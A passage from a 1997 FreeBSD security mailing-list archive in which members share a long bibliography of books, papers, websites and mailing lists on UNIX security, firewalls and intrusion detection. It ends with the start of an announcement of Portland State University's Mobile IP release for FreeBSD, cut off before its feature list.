Secure UNIX. Samuel Samalin. McGraw Hill. December 1996. ISBN: 0070545545

Security (Openframework Systems Architecture). Belinda Fairthorne. Prentice Hall. Publication date: March 1993. ISBN: 0136306586

The Underground Guide to UNIX: Slightly Askew Advice from a UNIX Guru. John Montgomery. Addison-Wesley Pub Co. 1995. ISBN: 0201406535

UNIX Installation Security and Integrity. David Ferbrache, Gavin Shearer. Prentice Hall. 1993. ISBN: 0130153893

UNIX Security: A Practical Tutorial (UNIX/C). N. Derek Arnold. McGraw-Hill. 1993. ISBN: 0070025606

UNIX System Security Essentials. Christoph Braun, Siemens Nixdorf. Addison-Wesley Pub Co. 1995. ISBN: 0201427753

UNIX System Security: How to Protect Your Data and Prevent Intruders. Rik Farrow, Rick Farrow. Addison-Wesley Pub Co. 1991. ISBN: 0201570300

UNIX Security Symposium IV Proceedings / October 4-6, 1993, Santa Clara, California, USA. Usenix Assoc. ISBN: 1880446553

--
-- Phil
-[ Philippe Regnauld / Systems Administrator / regnauld@prosa.dk ]-
-[ Location.: +55.4N +11.3E PGP Key: finger regnauld@hotel.prosa.dk ]-

From owner-freebsd-security Fri Aug 1 09:47:41 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA28644 for security-outgoing; Fri, 1 Aug 1997 09:47:41 -0700 (PDT)
Received: from www.buffalostate.edu (hummel@www.buffalostate.edu [136.183.2.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA28639 for ; Fri, 1 Aug 1997 09:47:27 -0700 (PDT)
Received: from localhost (hummel@localhost) by www.buffalostate.edu (8.8.5/8.8.5) with SMTP id MAA32164; Fri, 1 Aug 1997 12:47:10 -0400
Date: Fri, 1 Aug 1997 12:47:10 -0400 (EDT)
From: Dave Hummel To: Philippe Regnauld cc: freebsd-security@FreeBSD.ORG Subject: Re: Security books (was: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <19970731221445.04992@deepo.prosa.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id JAA28640 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk This is a great list! Can I post this on my web page as is (with names included)? I really want to give credit where credit is due. ------------------------------------------------------------------------ When you get to the end of your rope, tie a knot and hang on. And swing! ------------------------------------------------------------------------ On Thu, 31 Jul 1997, Philippe Regnauld wrote: > Jordan K. Hubbard writes: > > > > The body of available UNIX documentation out there, much of which is > > listed in the glossary of the FreeBSD handbook, is about as good as it > > gets and it isn't all that bad - even as complete a "checklist" as I > > could imagine would end up being largely replicating the docs which > > these books currently provide. > > Books have been mentioned several times -- I can only agree > with Jordan and say "read 'em" -- so here's a list that's just > been forwarded to me from osiris@pacificnet.net (cf. Bugtraq and > BoS) -- hey, Vinnie, read up :-) > > Internet Firewalls and Network Security. Chris Hare, Karanjit > Siyan. 2nd Edition. New Riders Pub. August 1,1996. ISBN: > 1562056328 > > Internet Firewalls. Scott Fuller, Kevin Pagan. Ventana Communications > Group Inc. January 1997. ISBN: 1566045061 > > Building Internet Firewalls. D. Brent Chapman, Elizabeth D. Zwicky. > O'Reilly & Associates (ORA). September 1,1995. ISBN: 1565921240 > > Firewalls and Internet Security : Repelling the Wily Hacker. > Addison-Wesley Professional Computing. William R. 
Cheswick, Steven M. > Bellovin. June 1,1994. ISBN: 0201633574 > Actually Useful Internet Security Techniques. Larry J. Hughes, Jr. New > Riders Publishing, ISBN 1-56205-508-9 > > PCWEEK Intranet and Internet Firewall Strategies. Ed Amoroso & Ron > Sharp, Ziff Davies > > Internet Security Resource Library : Internet Firewalls and Network > Security, Internet Security Techniques, Implementing Internet Security. > New Riders. December 1995. ISBN: 1562055062 > > Firewalls FAQ. Marcus J. Ranum. > http://www.cis.ohio-state.edu/hypertext/faq/usenet/firewalls-faq/faq.html > > NCSA Firewall Policy Guide. Compiled by Stephen Cobb, Director of > Special Projects. National Computer Security Association. > http://www.ncsa.com/fwpg_p1.html > > Comparison: Firewalls. June 17, 1996. LanTimes. Comprehensive comparison > of a wide variety of firewall products. > http://www.lantimes.com/lantimes/usetech/compare/pcfirewl.html > > There Be Dragons. Steven M. Bellovin. "To appear in Proceedings of the > Third Usenix UNIX Security Symposium, Baltimore, September 1992." AT&T > Bell Laboratories, Murray Hill, NJ. August 15, 1992 > > Rating of application layer proxies. Michael Richardson. Wed Nov 13 > 13:54:09 EST 1996. > http://www.sandelman.ottawa.on.ca/SSW/proxyrating/proxyrating.html > > Keeping your site comfortably secure: An Introduction to Internet > Firewalls. John P. Wack and Lisa J. Carnahan. National Institute > ofStandards and Technology. John Wack Thursday, Feb 9 18:17:09 EST 1995. > http://csrc.ncsl.nist.gov/nistpubs/800-10/ > > SQL*Net and Firewalls. David Sidwell & Oracle Corporation. > http://www.zeuros.co.uk/firewall/library/oracle-and-fw.pdf > > Covert Channels in the TCP/IP Protocol Suite. Craig Rowland. Rotherwick > & Psionics Software Systems Inc. > http://www.zeuros.co.uk/firewall/papers.htm > > If You Can Reach Them, They Can Reach You. A PC Week Online Special > Report, June 19, 1995. William Dutcher. 
> http://www.pcweek.com/sr/0619/tfire.html > > Packet Filtering for Firewall Systems. February 1995. CERT (and Carnegie > Mellon University.) ftp://info.cert.org/pub/tech_tips/packet_filtering > > Network Firewalls. Steven M. Bellovin and William R. Cheswick. > ieeecm, 32(9), pp. 50-57, September 1994. > > Session-Layer Encryption. Matt Blaze and Steve Bellovin. Proceedings of > the USENIX Security Workshop, June 1995. > > A Network Perimeter With Secure External Access. An extraordinary paper > that details the implementation of a firewall purportedly at the White > House. (Yes, the one at 1600 Pennsylvania Avenue.) Frederick M. Avolio; > Marcus J. Ranum. (Trusted Information Systems, Incorporated). Glenwood, > MD. January 25, 1994. > http://www.alw.nih.gov/Security/FIRST/papers/firewall/isoc94.ps > > > Packets Found on an Internet. Interesting Analysis of packets appearing > at the Application Gateway of AT&T. Steven M. Bellovin. Lambda. August > 23, 1993. ftp://ftp.research.att.com/dist/smb/packets.ps > > Using Screend to implement TCP/IP Security Policies. Jeff Mogul. > Rotherwick and Digital. > http://www.zeuros.co.uk/firewall/library/screend.ps > > Firewall Application Notes. Good document that starts out by describing > how to build a firewall. It also addresses application proxies, Sendmail > in relation to firewalls and the characteristics of a bastion host. > Livingston Enterprises, Inc. > http://www.telstra.com.au/pub/docs/security/firewall-1.1.ps.Z > > X Through the Firewall, and Other Application Relays. Treese/Wolman > Digital Equipment Corp. Cambridge Research Lab. (October, 1993?). > ftp://crl.dec.com/pub/DEC/CRL/tech-reports/93.10.ps.Z > > Intrusion Protection for Networks 171. BYTE Magazine. April, 1995. > > Benchmarking Methodology for Network Interconnect Devices. RFC 1944. S. > Bradner & J. McQuaid. ftp://ds.internic.net/rfc/rfc1944.txt > > Firewall Performance Measurement Techniques: A Scientific Approach. > Marcus Ranum. 
February 4, 1996 (Last Known Date of Mod.) > http://www.v-one.com/pubs/perf/approaches.htm > > WARDING OFF THE CYBERSPACE INVADERS. Business Week. 03/13/95. Amy > Cortese in New York, with bureau reports > > Vulnerability in Cisco Routers used as Firewalls. Computer Incident > Advisory Capability Advisory: Number D-15. May 12, 1993 1500 PDT. > http://ciac.llnl.gov/ciac/bulletins/d-15.shtml > > WAN-Hacking with AutoHack - Auditing Security behind the Firewall. Alec > D.E. Muffett. (network Security Group, Sun Microsystems, United > Kingdom.) Written by the author of Crack, the famous password cracking > program. Extraordinary document that deals with methods of auditing > security from behind a firewall. (And auditing of a network so large > that it contained tens of thousands of hosts!) June 6, 1995. > http://www.telstra.com.au/pub/docs/security/muffett-autohack.ps > > Windows NT Firewalls Are Born. February 4, 1997. PC Magazine. > http://www.pcmagazine.com/features/firewall/_open.htm > Group of 15 Firewalls Hold Up Under Security Scrutiny. Stephen > Lawson June 1996. > InfoWorld. > http://www.infoworld.com/cgi-bin/displayStory.pl?96067.firewall.htm > > IP v6 Release and Firewalls. Uwe Ellermann. 14th Worldwide Congress on > Computer and Communications Security. Protection, pp. 341-354, June > 1996. > > The SunScreen Product Line Overview. (Sun Microsystems.) > http://www.sun.com/security/overview.html > > Product Overview for IBM Internet Connection Secured Network Gateway for > AIX, Version 2.2. (IBM Firewall Information.) > http://www.ics.raleigh.ibm.com/firewall/overview.htm > > The Eagle Firewall Family. (Raptor Firewall Information.) > http://www.raptor.com/products/brochure/40broch.html > > Secure Computing Firewall™ for NT. Overview. (Secure Computing). > http://www.sctc.com/NT/HTML/overview.html > > Check Point FireWall-1 Introduction. (Checkpoint Technologies Firewall > Information.) 
http://www.checkpoint.com/products/firewall/intro.html > > Cisco PIX Firewall. (Cisco Systems Firewall Information.) > http://www.cisco.com/univercd/data/doc/cintrnet/prod_cat/pcpix.htm > > Protecting the Fortress From Within and Without. R. Scott Raynovich. > April 1996. LAN Times. http://www.wcmh.com/lantimes/96apr/604c051a.html > > Internet Firewalls: An Introduction. Firewall White Paper. NMI Internet > Expert Services. PO Box 8258. Portland, ME 04104-8258. > http://www.netmaine.com/netmaine/whitepaper.html > > Features of the Centri(TM) Firewall. (Centri Firewall Information.) > http://www.gi.net/security/centrifirewall/features.html > > Five Reasons Why an Application Gateway is the Most Secure Firewall. > (Global Internet.) > http://www.gi.net/security/centrifirewall/fivereasons.html > > An Introduction to Intrusion Detection. Aurobindo Sundaram. Last > Apparent Date of Modification: October 26, 1996. > http://www.techmanager.com/nov96/intrus.html > > Intrusion Detection for Network Infrastructures. S. Cheung, K.N. Levitt, > C. Ko. 1995 IEEE Symposium on Security and Privacy, Oakland, CA, May > 1995. http://seclab.cs.ucdavis.edu/papers/clk95.ps > > Network Intrusion Detection. Biswanath Mukherjee and L. Todd Heberlein > and Karl N. Levitt. IEEE Network, May 1994. > > Fraud and Intrusion Detection in Financial Information Systems. S. > Stolfo and P. Chan and D. Wei and W. Lee and A. Prodromidis. 4th > ACM Computer and Communications Security Conference, 1997. > http://www.cs.columbia.edu/~sal/hpapers/acmpaper.ps.gz > > A Pattern-Oriented Intrusion-Detection Model and Its Applications. > Shiuhpyng W. Shieh and Virgil D. Gligor. Research in Security and > Privacy, IEEECSP, May 1991. > > Detecting Unusual Program Behavior Using the Statistical Component of > the Next-generation Intrusion Detection Expert System (NIDES). Debra > Anderson, Teresa F. Lunt, Harold Javitz, Ann Tamaru, and Alfonso Valdes. > SRI-CSL-95-06, May 1995. (Available in hard copy only.) 
Abstract: > http://www.csl.sri.com/tr-abstracts.html#csl9506 > > Intrusion Detection Systems (IDS): A Survey of Existing Systems and A > Proposed Distributed IDS Architecture. S.R. Snapp, J. Brentano, G.V. > Dias, T.L. Goan, T. Grance, L.T. Heberlein, C. Ho, K.N. Levitt, B. > Mukherjee, D.L. Mansur, K.L. Pon, and S.E. Smaha. Technical Report > CSE-91-7, Division of Computer Science, University of California, Davis, > February 1991. http://seclab.cs.ucdavis.edu/papers/bd96.ps > > A Methodology for Testing Intrusion Detection Systems. N. F. Puketza, K. > Zhang, M. Chung, B. Mukherjee, R. A. Olsson. IEEE Transactions on > Software Engineering, Vol.22, No.10, October 1996. > http://seclab.cs.ucdavis.edu/papers/tse96.ps > > GrIDS -- A Graph-Based Intrusion Detection System for Large Networks. S. > Staniford-Chen, S. Cheung, R. Crawford, M. Dilger, J. Frank, J. > Hoagland, K. Levitt, C. Wee, R. Yip, D. Zerkle. The 19th National > Information Systems Security Conference. > http://seclab.cs.ucdavis.edu/papers/nissc96.ps > > NetKuang--A Multi-Host Configuration Vulnerability Checker. D. Zerkle, > K. Levitt , Proc. of the 6th USENIX Security Symposium. San Jose, > California. 1996. http://seclab.cs.ucdavis.edu/papers/zl96.ps > > Simulating Concurrent Intrusions for Testing Intrusion Detection > Systems: Parallelizing Intrusions. M. Chung, N. Puketza, R.A. Olsson, B. > Mukherjee. Proc. of the 1995 National Information Systems Security > Conference. Baltimore, Maryland. 1995. > http://seclab.cs.ucdavis.edu/papers/cpo95.ps > > Holding Intruders Accountable on the Internet. S. Staniford-Chen, and > L.T. Heberlein. Proc. of the 1995 IEEE Symposium on Security and > Privacy, Oakland, CA, 8-10 May 1995. > http://seclab.cs.ucdavis.edu/~stanifor/seclab_only/notes/ieee_conf_94/revision/submitted.ps > > Machine Learning and Intrusion Detection: Current and Future Directions. > J. Frank. Proc. of the 17th National Computer Security Conference, > October 1994. 
>
> Another Intrusion Detection Bibliography.
> http://doe-is.llnl.gov/nitb/refs/bibs/bib1.html
>
> Intrusion Detection Bibliography.
> http://www.cs.purdue.edu/coast/intrusion-detection/ids_bib.html
>
> Intrusion Detection Systems. This list concentrates primarily on
> discussions about methods of intrusion or intrusion detection.
> Target: majordomo@uow.edu.au
> Command: subscribe ids (In BODY of message)
>
> The WWW Security List. Members of this list discuss all techniques to
> maintain (or subvert) WWW security. (Things involving secure methods of
> HTML, HTTP and CGI.)
> Target: www-security-request@nsmx.rutgers.edu
> Command: SUBSCRIBE www-security your_email_address (In BODY of message)
>
> The Sneakers List. This list discusses methods of circumventing firewall
> and general security. This list is reserved for lawful tests and
> techniques.
> Target: majordomo@CS.YALE.EDU
> Command: SUBSCRIBE Sneakers (In BODY of message)
>
> The Secure HTTP List. This list is devoted to the discussion of S-HTTP
> and techniques to facilitate this new form of security for WWW
> transactions.
> Target: shttp-talk-request@OpenMarket.com
> Command: SUBSCRIBE (In BODY of message)
>
> The NT Security List. This list is devoted to discussing all techniques
> of security related to the Microsoft Windows NT operating system.
> (Individuals also discuss security aspects of other Microsoft operating
> systems as well.)
> Target: request-ntsecurity@iss.net
> Command: subscribe ntsecurity (In BODY of message)
>
> The Bugtraq List. This list is for posting or discussing bugs in various
> operating systems, though UNIX is the most often discussed. The
> information here can be quite explicit. If you are looking to learn the
> fine aspects (and cutting edge news) in UNIX security, this list is for
> you.
> Target: LISTSERV@NETSPACE.ORG
> Command: SUBSCRIBE BUGTRAQ (In BODY of message)
>
> Password Security: A Case History. Robert Morris and Ken Thompson.
> http://www.sevenlocks.com/papers/password/pwstudy.ps
>
> Site Security Handbook (update and I-Draft version; June 1996, CMU.
> Draft-ietf-ssh-handbook-03.txt.) Barbara Fraser.
> http://www.internic.net/internet-drafts/draft-ietf-ssh-handbook-03.txt
>
> Improving the Security of Your Site by Breaking Into It. Dan Farmer &
> Wietse Venema. (1995) http://www.craftwork.com/papers/security.html
>
> Making Your Setup More Secure. NCSA Tutorial Pages.
> http://hoohoo.ncsa.uiuc.edu/docs/tutorials/security.html
>
> The Secure HyperText Transfer Protocol. E. Rescorla, A. Schiffman (EIT)
> July 1995.
> http://www.eit.com/creations/s-http/draft-ietf-wts-shttp-00.txt
>
> The SSL Protocol. (I-Draft) Alan O. Freier & Philip Karlton (Netscape
> Communications) with Paul C. Kocher.
> http://home.netscape.com/eng/ssl3/ssl-toc.html
>
> Writing, Supporting, and Evaluating TripWire: A Publicly Available
> Security Tool. Kim/Spafford. http://www.raptor.com/lib/9419.ps
>
> The Design and Implementation of TripWire: A Filesystem Integrity
> Checker. Kim/Spafford. Location: http://www.raptor.com/lib/9371.ps
>
> X Window System Security. Ben Gross & Baba Buehler. Beckman Institute
> System Services.
> http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html
> Last Apparent Date of Modification: January 11, 1996.
>
> On the (in)Security of the Windowing System X. Marc VanHeyningen of
> Indiana University. http://www.cs.indiana.edu/X/security/intro.html
> September 14, 1994.
>
> Security in the X11 Environment. Pangolin. University of Bristol, UK.
> January, 1995. http://sw.cse.bris.ac.uk/public/Xsecurity.html
>
> Security in Open Systems. (NIST) John Barkley, Editor. (With Lisa
> Carnahan, Richard Kuhn, Robert Bagwill, Anastase Nakassis, Michael
> Ransom, John Wack, Karen Olsen, Paul Markovitz and Shu-Jen Chang.) US
> Department of Commerce. Section: The X Window System: Bagwill, Robert.
> http://csrc.ncsl.nist.gov/nistpubs/800-7/node62.html#SECTION06200000000000000000
>
> Security Enhancements of the DEC MLS+ System; The Trusted X Window
> System. November, 1995.
> http://ftp.digital.com/pub/Digital/info/SPD/46-21-XX.txt
>
> Evolution of a Trusted B3 Window System Prototype. J. Epstein, J. Mc
> Hugh, R. Pascale, C. Martin, D. Rothnie, H. Orman, A. Marmor-Squires,
> M. Branstad, and B. Danner. In Proceedings of the 1992 IEEE Symposium
> on Security and Privacy, 1992.
>
> A Prototype B3 Trusted X Window System. J. Epstein, J. Mc Hugh, R.
> Pascale, H. Orman, G. Benson, C. Martin, A. Marmor-Squires, B. Danner,
> and M. Branstad. The Proceedings of the 7th Computer Security
> Applications Conference, December, 1991.
>
> Improving X Windows Security. UNIX World, (Volume IX, Number 12)
> December 1992. Linda Mui.
>
> Security and the X Window System. UNIX World, 9(1), p. 103. January
> 1992. Dennis Sheldrick.
>
> The X Window System. Scheifler, Robert W. & Gettys, Jim. ACM
> Transactions on Graphics. Vol.5, No. 2 (April 1986), pp. 79-109.
> http://www.acm.org/pubs/toc/Abstracts/0730-0301/24053.html
>
> X Window Terminals. Digital Technical Journal of Digital Equipment
> Corporation, 3(4), pp. 26-36, Fall 1991. Björn Engberg and Thomas
> Porcher.
> ftp://ftp.digital.com/pub/Digital/info/DTJ/v3n4/X_Window_Terminals_01jul1992DTJ402P8.ps
>
> Information Security: Computer Attacks at Department of Defense Pose
> Increasing Risks; General Accounting Office. Report on Failed Security
> at US Defense Sites.
> http://www.epic.org/security/GAO_OMB_security.html
>
> Defense Directive 5200.28. "Security requirements for Automated
> Information Systems." Document describing some antiquated government
> standards for security.
> http://140.229.1.16:9000/htdocs/teinfo/directives/soft/5200.28.html
>
> The Evaluated Products List (EPL). A list of products that have been
> evaluated for security ratings, based on DOD guidelines.
> http://www.radium.ncsc.mil/tpep/epl/index.html
>
> INTERNIC, or the Network Information Center.
> INTERNIC provides
> comprehensive databases on networking information. These databases
> contain the larger portion of collected knowledge on the design and
> scope of the Internet. (Of main importance here is the database of RFC
> documents.)
> http://ds0.internic.net/ds/dspg1intdoc.html
>
> The Rand Corporation. Security resources of various sorts. Also: very
> engrossing "early" documents on the Internet's design.
> http://www.rand.org/publications/electronic/
>
> Connected: An Internet Encyclopedia. (Incredible on-line resource for
> RFC documents and related information, apparently painstakingly
> translated into HTML.)
> http://www.freesoft.org/Connected/RFC/826/
>
> The Computer Emergency Response Team. (CERT) An organization that
> assists sites in responding to network security violations, break-ins
> and so forth. Great source of information, particularly for
> vulnerabilities.
> http://www.cert.org
>
> Security Survey of Key Internet Hosts & Various Semi-Relevant
> Reflections. D. Farmer. Fascinating independent study conducted by one
> of the authors of the now famous SATAN program. The survey involved
> approximately 2200 sites. The results are disturbing.
> http://www.trouble.org/survey/
>
> CIAC. (U.S. Department of Energy's Computer Incident Advisory
> Capability.) The CIAC provides computer security services to employees
> and contractors of the United States Department of Energy, but the site
> is open to the public as well. There are many tools and documents at
> this location.
> http://ciac.llnl.gov/
>
> The National Computer Security Association. This site contains a great
> deal of valuable security information, including reports, papers,
> advisories and analyses of various computer security products and
> techniques.
> http://www.ncsa.com/
>
> Short Courses in Information Systems Security at George Mason
> University. This site contains information about security courses.
> Moreover, there are links to a comprehensive bibliography of various
> security related documents.
> http://www.isse.gmu.edu:80/~gmuisi/
>
> NCSA RECON. Spooks on the Net. The National Computer Security
> Association's "special" division. They offer a service where one can
> search through thousands of downloaded messages passed amongst hackers
> and crackers on BBS boards and the Internet. An incredible security
> resource, but a commercial one.
> http://www.isrecon.ncsa.com/public/faq/isrfaq.htm
>
> Lucent Technologies. Courses on security from the folks who really know
> security.
> http://www.attsa.com/
>
> Massachusetts Institute of Technology distribution site for United
> States residents for Pretty Good Privacy (PGP). PGP provides some of the
> most powerful, military grade encryption currently available.
> http://web.mit.edu/network/pgp.html
>
> The Anonymous Remailer FAQ. A document that covers all aspects of
> anonymous remailing techniques and tools.
> http://www.well.com/user/abacard/remail.html
>
> The Anonymous Remailer List. A comprehensive but often changing
> (dynamic) list of anonymous remailers.
> http://www.cs.berkeley.edu/~raph/remailer-list.html
>
> Microsoft ActiveX Security. This page addresses the security features of
> ActiveX.
> http://www.microsoft.com/intdev/signcode/
>
> Purdue University COAST Archive. One of the more comprehensive security
> sites, containing many tools and documents of deep interest within the
> security community.
> http://www.cs.purdue.edu//coast/archive/
>
> Raptor Systems. Makers of one of the better firewall products on the Net
> have established a fine security library.
> http://www.raptor.com/library/library.html
>
> The Risks Forum. A moderated digest of security and other risks in
> computing. A great resource that is also searchable. You can tap the
> better security minds on the Net.
> http://catless.ncl.ac.uk/Risks
>
> FIRST. (Forum of Incident Response and Security Teams).
> A conglomeration
> of many organizations undertaking security measures on the Internet. A
> powerful organization and good starting place for sources.
> http://www.first.org/
>
> The CIAC Virus Database. The ultimate virus database on the Internet. An
> excellent resource to learn about various viruses that can affect your
> platform.
> http://ciac.llnl.gov/ciac/CIACVirusDatabase.html
>
> Information Warfare and Information Security on the Web. A comprehensive
> list of links and other resources concerning Information Warfare over
> the Internet.
> http://www.fas.org/irp/wwwinfo.html
>
> Criminal Justice Studies of the Law Faculty of University of Leeds, The
> United Kingdom. Site with interesting information on cryptography and
> civil liberties.
> http://www.leeds.ac.uk/law/pgs/yaman/cryptog.htm
>
> Federal Information Processing Standards Publication documents.
> (Government guidelines.) National Institute of Standards and Technology
> reports on DES encryption and related technologies.
> http://csrc.nist.gov/fips/fips46-2.txt
>
> Wordlists available at NCSA and elsewhere. (For use in testing the
> strength of, or "cracking" UNIX passwords.)
> http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html
>
> Department of Defense Password Management Guideline. (Treatment of
> password security in classified environments.)
> http://www.alw.nih.gov/Security/FIRST/papers/password/dodpwman.txt
>
> Dr. Solomon's. A site filled with virus information. Anyone concerned
> with viruses (or anyone who just wants to know more about virus
> technology) should visit Dr. Solomon's site.
> http://www.drsolomon.com/vircen/allabout.html
>
> The Seven Locks server. An eclectic collection of security resources,
> including a number of papers that cannot be found elsewhere!
> http://www.sevenlocks.com/CIACA-10.htm
>
> S/Key informational page. Provides information on S/Key and use of one
> time passwords in authentication.
> http://medg.lcs.mit.edu/people/wwinston/skey-overview.html
>
> A page devoted to ATP, the "Anti-Tampering Program". (In some ways,
> similar to Tripwire or Hobgoblin.)
> http://www.cryptonet.it/docs/atp.html
>
> Bugtraq Archives. An archive of the popular mailing list, Bugtraq. This
> is significant because Bugtraq is one of the most reliable sources for
> up-to-date reports on newly found vulnerabilities in UNIX (and at times,
> other operating systems.)
> http://geek-girl.com/bugtraq/
>
> Wang Federal. This company produces very high quality security operating
> systems and other security solutions. They are the leader in TEMPEST
> technology.
> http://www.wangfed.com
>
> The Center for Secure Information Systems. This site, affiliated with
> the Center at George Mason University, has some truly incredible papers.
> There is much research going on here; research of a cutting edge nature.
> The link below sends you directly to the publications page, but you
> really should explore the entire site.
> http://www.isse.gmu.edu/~csis/publication.html
>
> SRI International. Some very highbrow technical information. The
> technical reports here are of extreme value. However, you must have at
> least a fleeting background in security to even grasp some of the
> concepts. Nevertheless, a great resource.
> http://www.sri.com/
>
> The Security Reference Index. This site, maintained by the folks at
> telstra.com, is a comprehensive pointer page to many security resources.
> http://www.telstra.com.au/info/security.html
>
> Wietse Venema's Tools Page. This page, maintained by Wietse Venema
> (co-author of SATAN and author of TCP_Wrapper and many other security
> tools), is filled with papers, tools and general information. It is a
> must-visit for any UNIX system administrator.
> ftp://ftp.win.tue.nl/pub/security/index.html
>
> United States. Congress. House. Committee on Science, Space, and
> Technology. Subcommittee on Science. Internet Security: Hearing Before
> the Subcommittee on Science of the Committee on Science, Space, and
> Technology.
> U.S. House of Representatives, One Hundred Third Congress,
> second session, March 22, 1994. Washington. U.S. G.P.O. For sale by
> the U.S. G.P.O., Supt. of Docs., Congressional Sales Office, 1994.
>
> UNIX Unleashed. SAMS Publishing, 1994. ISBN: 0-672-30402-3.
>
> Internet QuickKIT. Brad Miser. HAYDEN. ISBN: 1568302401
>
> Bots and Other Internet Beasties. SAMS.NET. Joseph Williams. ISBN:
> 1575210169 (1996)
>
> The Internet Unleashed 1996. SAMS.NET. SAMS Development Group. ISBN:
> 157521041X. (1995)
>
> Microsoft Internet Information Server 2 Unleashed. Arthur Knowles.
> SAMS.NET. ISBN: 1575211092. (1996)
>
> Designing and Implementing Microsoft Internet Information Server.
> SAMS.NET. ISBN: 1575211688. (1996)
>
> Internet Research Companion. Que Education and Training. Geoffrey McKim.
> ISBN: 1575760509. (1996)
>
> An Interactive Guide to the Internet. Que Education and Training. J.
> Michael Blocher, Vito Amato & Jon Storslee. ISBN: 1575763540. (1996)
>
> Internet Security for Business. New York. Wiley, 1996. xi, 452 p. :
> ill. ; 24 cm. LC CALL NUMBER: HD30.38 .I57 1996
>
> Managing Windows NT Server 4. NRP. Howard F. Hilliker. ISBN: 1562055763.
> (1996)
>
> Internet 1997 Unleashed, Second Edition. SAMS.NET. Jill Ellsworth, Billy
> Barron, et al. ISBN: 1575211858. (1996)
>
> Windows NT Server 4 Security, Troubleshooting, and Optimization. NRP.
> ISBN: 1562056018. (1996)
>
> Apache Server Survival Guide. SAMS.NET. Manuel Alberto Ricart. ISBN:
> 1575211750. (1996)
>
> Internet Firewalls and Network Security, Second Edition. NRP. Chris Hare
> and Karanjit S. Siyan, Ph.D. ISBN: 1562056328. (1996)
>
> PC Week Intranet and Internet Firewalls Strategies. ZDPRESS. Ed Amoroso
> & Ronald Sharp. ISBN: 1562764225. (1996)
>
> Internet Security Professional Reference. NRP. Chris Hare, et al. ISBN:
> 1562055577. (1996)
>
> NetWare Security. NRP. William Steen. ISBN: 1562055453. (1996)
>
> Internet Security Resource Library. NRP. Box-set. ISBN: 1562055062.
> (1996)
>
> LINUX System Administrator's Survival Guide. SAMS. Timothy Parker, Ph.
> D. ISBN: 0672308509. (1996)
>
> Internet Commerce. NRP. Andrew Dahl and Leslie Lesnick. ISBN:
> 1562054961. (1995)
>
> Windows NT Server 4 Security, Troubleshooting, and Optimization. NRP.
> ISBN: 1562056018. (1996)
>
> E-Mail Security: How To Keep Your Electronic Messages Private. Bruce
> Schneier. John Wiley & Sons Inc. 605 Third Ave. New York, NY 10158.
> ISBN: 0-471-05318-X
>
> Protection and Security on the Information Superhighway. Frederick B.
> Cohen. John Wiley & Sons Inc. 605 Third Ave. New York, NY 10158. ISBN:
> 0-471-11389-1
>
> Firewalls and Internet Security: Repelling the Wily Hacker. William R.
> Cheswick and Steven M. Bellovin. Addison-Wesley Publishing Co. 1 Jacob
> Way Reading, MA 01867. ISBN: 0-201-63357-4
>
> Practical UNIX & Internet Security, 2nd Edition. Simson Garfinkel & Gene
> Spafford. 2nd Edition April 1996. ISBN: 1-56592-148-8.
>
> UNIX System Security. David A. Curry. Addison Wesley Publishing Company,
> Inc. 1992. ISBN: 0-201-56327-4
>
> Secure UNIX. Samuel Samalin. McGraw Hill. December 1996. ISBN:
> 0070545545
>
> Security (Openframework Systems Architecture). Belinda Fairthorne.
> Prentice Hall. Publication date: March 1993. ISBN: 0136306586
>
> The Underground Guide to UNIX: Slightly Askew Advice from a UNIX Guru.
> John Montgomery. Addison-Wesley Pub Co. 1995. ISBN: 0201406535
>
> UNIX Installation Security and Integrity. David Ferbrache, Gavin
> Shearer. Prentice Hall. 1993. ISBN: 0130153893
>
> UNIX Security: A Practical Tutorial (UNIX/C). N. Derek Arnold.
> McGraw-Hill. 1993. ISBN: 0070025606
>
> UNIX System Security Essentials. Christoph Braun, Siemens Nixdorf.
> Addison-Wesley Pub Co. 1995. ISBN: 0201427753
>
> UNIX System Security: How to Protect Your Data and Prevent Intruders.
> Rik Farrow. Addison-Wesley Pub Co. 1991. ISBN: 0201570300
>
> UNIX Security Symposium IV Proceedings/October 4-6, 1993 Santa Clara,
> California, USA.
> Usenix Assoc. ISBN: 1880446553
>
> --
> -- Phil
>
> -[ Philippe Regnauld / Systems Administrator / regnauld@prosa.dk ]-
> -[ Location.: +55.4N +11.3E PGP Key: finger regnauld@hotel.prosa.dk ]-
>

From owner-freebsd-security Fri Aug 1 11:13:33 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA03634 for security-outgoing; Fri, 1 Aug 1997 11:13:33 -0700 (PDT)
Received: from jli.com (jli.com [199.2.111.1]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id LAA03627 for ; Fri, 1 Aug 1997 11:13:29 -0700 (PDT)
Received: from cumulus by jli.com with uucp (Smail3.1.29.1 #3) id m0wuMC9-0002TOC; Fri, 1 Aug 97 11:12 PDT
Message-Id:
To: security@freebsd.org
From: Bill Trost
Subject: Mobile IP for FreeBSD from Portland State University
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <668.870458449.1@cloud.rain.com>
Date: Fri, 01 Aug 1997 11:00:50 -0700
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Portland State University's newest release of Mobile IP for FreeBSD is now available. This release combines Mobile IP routing with IPSEC security. Mobile IP is a network protocol that allows hosts ("mobile nodes") to change their point of Internet connectivity without having to change their IP address.

ftp://ftp.cs.pdx.edu/pub/mobile/mip-July97.tar.gz contains the release. It includes kernel sources based on FreeBSD 2.2.1 and PAO-970331, including ISA and PCMCIA WaveLAN drivers, source code for Mobile IP utilities and daemons, and binaries of all the user-level programs. Portions of the release are export controlled. They can only be downloaded by filling out a form at http://web.mit.edu/network/isakmp/isakmpform.html.

New in this release:

